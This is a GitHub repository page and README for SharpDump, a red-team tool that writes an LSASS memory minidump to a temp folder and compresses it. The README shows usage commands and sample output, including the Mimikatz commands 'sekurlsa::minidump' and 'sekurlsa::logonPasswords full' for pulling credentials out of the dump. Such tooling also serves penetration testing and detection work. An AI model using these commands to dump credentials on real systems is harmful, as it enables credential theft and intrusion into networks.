Skip to content
master
Go to file
Code

Latest commit

Check if admin privilege only if trying to dump lsass
41cfcf9

Git stats

Files

Permalink
Failed to load latest commit information.

README.md

SharpDump


SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. The MiniDumpWriteDump Win32 API call is used to create a minidump for the process ID specified (LSASS by default) to C:\Windows\Temp\debug.out, GZipStream is used to compress the dump to C:\Windows\Temp\debug.bin (.gz format), and the original minidump file is deleted.

@harmj0y is the primary author of this port.

SharpDump is licensed under the BSD 3-Clause license.

Usage

Dump LSASS:

C:\Temp>SharpDump.exe

[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out

[+] Dumping completed. Rename file to "debug808.gz" to decompress.

[*] Operating System : Windows 10 Enterprise N
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

Dump a specific process ID:

C:\Temp>SharpDump.exe 8700

[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out

[+] Dumping completed. Rename file to "debug8700.gz" to decompress.

Compile Instructions

We are not planning on releasing binaries for SharpDump, so you will have to compile yourself :)

SharpDump has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.

About

SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.

Resources

License

Releases

No releases published

Packages

No packages published

Languages

You can’t perform that action at this time.